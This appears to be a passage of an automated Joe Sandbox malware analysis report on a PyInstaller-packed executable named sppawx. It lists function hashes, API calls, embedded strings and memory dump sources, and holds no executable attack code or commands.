                                                                                                                                                                                                                              • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction ID: 43981e17545ad3b6d0ad05ae6b51d6c06c424fea9fa29da47af638cf7ef42113
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01F03410E0F20244FEB47AB259512B8B2908F94BE0FC902BCAC2E856C2DE2CA4808230
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction ID: 05c46e7c3f19d902a82c6ca35d0ffc88125f0170587f6fbf4177c0ea1be8c11b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11D16032E0AA8286F720EF74E8542A9B760FB84B58FC0427DEA5D42A94DF3CD545C754
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
                                                                                                                                                                                                                              • API String ID: 3568877910-4109427827
                                                                                                                                                                                                                              • Opcode ID: f3c89cab712f7899d68f9ad75fe1cd1ac2abf68c077fe45f7e17a93191ebbc8a
                                                                                                                                                                                                                              • Instruction ID: f7fccc038658c36bc3a28d0ee9f6169587951729bf9a1d75893192718d2585fc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3c89cab712f7899d68f9ad75fe1cd1ac2abf68c077fe45f7e17a93191ebbc8a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF15622A08A8286EA758B25A85423D67A1FFC5B85F0C443BDE5E42EB4FF3DF454C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A31841B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A31849E
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184BD
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184CB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184DC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184E5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction ID: b245a6d5e6da75a0f844115528a7a28c14c3ff5ee32dd14997095a75ec9c24f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62416221B0E54285FA70FB34E4495B9B360FB94754FC0067EE69D426D4DF3CD5468724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 08efb2bdee9f98be2b3c6710b5812631814cf93b04d3daaf3e92c0f1bde12c4a
                                                                                                                                                                                                                              • Instruction ID: f1634cded2b48513eebd50ac558753a9f28779a60aa26ea758ea58169d5729f1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08efb2bdee9f98be2b3c6710b5812631814cf93b04d3daaf3e92c0f1bde12c4a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53312C72609B8186EB709F60E8903ED7361FB84744F48443ADA8E47EA8EF3DD649C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 35a7589cc452a559f716fbf76e6c2d0995ef5bb5efcdcd1d759a878c2b8be3e9
                                                                                                                                                                                                                              • Instruction ID: d028eb7b5da4b21bcbb839056e041013eaab2f3908d7395f9c347533c6ba78df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35a7589cc452a559f716fbf76e6c2d0995ef5bb5efcdcd1d759a878c2b8be3e9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B314C76619B819AEB708F60E8507ED7370FB84754F48443ADA4E47AA4EF3CD648C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction ID: 20b701dc6ffc5b028bacd0d82e696e89ffd76408bc77ba66904c324212a735c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE311D72A0AA8186FB709F60E8443EEB364FB85744F84453EDA4E47B94EF38D548C720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335CB5
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33561C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF79A32A94F,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32A979
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF79A32A94F,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32A99E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335CA4
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F1A
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F2B
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F3C
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79A33617C), ref: 00007FF79A335F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                              • Instruction ID: 3b484ac50d4e111ac76a3f2ab287e26252b5ff5c68401f3e8781e938fc4dcac7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D1AD22E0E2428AFB30BF36D8511B9B6A1EF44784FC0917EEA4D47A95DF3CE4418760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction ID: 7a3959de93039282e157ae04f5481e05272fd7b9dbb69084736715d6bd93dca3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36315E32A19B8186EB60DF35E8442AEB3A4FB89754F94027EEA8D43B54DF3CC1458B10
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007C3440ErrorLast
                                                                                                                                                                                                                              • String ID: NOO$surrogatepass$unsupported address family
                                                                                                                                                                                                                              • API String ID: 3556311781-472101058
                                                                                                                                                                                                                              • Opcode ID: 379f0d8483181ee031b79a6958d76256660427ce1b6611028b8dd15b66d8b172
                                                                                                                                                                                                                              • Instruction ID: 411d1d2d4058c9137794212e4cd97d27be9bbf7a57f2ca71842f1db323d7a56a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 379f0d8483181ee031b79a6958d76256660427ce1b6611028b8dd15b66d8b172
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96816032E09752A1EA358B25A44427D63A0FFD5BA0F285136DE5E42BB4FF3DE581C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                              • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                              • Instruction ID: b0ff41ac84198448cbcf2568e0ac2fe20c8b03adda14bb607e648aef98ac31ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0B17F22F1E69642FE71AB7294001B9F291AB44BE4FC4517DEE5E07B99EF7CE4418320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F1A
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33567C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F2B
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33561C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF79A335F3C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A335638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A33564C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9CE
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A32A9B8: GetLastError.KERNEL32(?,?,?,00007FF79A332D92,?,?,?,00007FF79A332DCF,?,?,00000000,00007FF79A333295,?,?,?,00007FF79A3331C7), ref: 00007FF79A32A9D8
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF79A33617C), ref: 00007FF79A335F63
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3458911817-0
                                                                                                                                                                                                                              • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                              • Instruction ID: 37bb2e31aadd618a36d41bc34ce82cdb919f596565e8e273e8dc3f1907308c56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15514E22E1E6428AF730FF36D8915A9F760AB48784FC5917DEA4D43A96DF3CE4408760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Cannot create a server socket with a PROTOCOL_TLS_CLIENT context, xrefs: 00007FFEDD23BB24
                                                                                                                                                                                                                              • Cannot create a client socket with a PROTOCOL_TLS_SERVER context, xrefs: 00007FFEDD23BB6A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751677591.00007FFEDD230000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD250000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD259000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751719552.00007FFEDD25D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751883985.00007FFEDD260000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751922759.00007FFEDD262000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd230000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                              • String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context
                                                                                                                                                                                                                              • API String ID: 3568877910-1683031804
                                                                                                                                                                                                                              • Opcode ID: 6805dc30597dff21a4c173714841e7ce727ae3a140b818bf0894f314996c17d8
                                                                                                                                                                                                                              • Instruction ID: c327b5d0807f2bea31a7431f8e51892f16150c09d6eb663b15f06ed647a7e2e5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6805dc30597dff21a4c173714841e7ce727ae3a140b818bf0894f314996c17d8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDA12876A08B4686EA749F26E84452E63A1FFC5B94B08453ACE4E43F74EF3DF4568700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
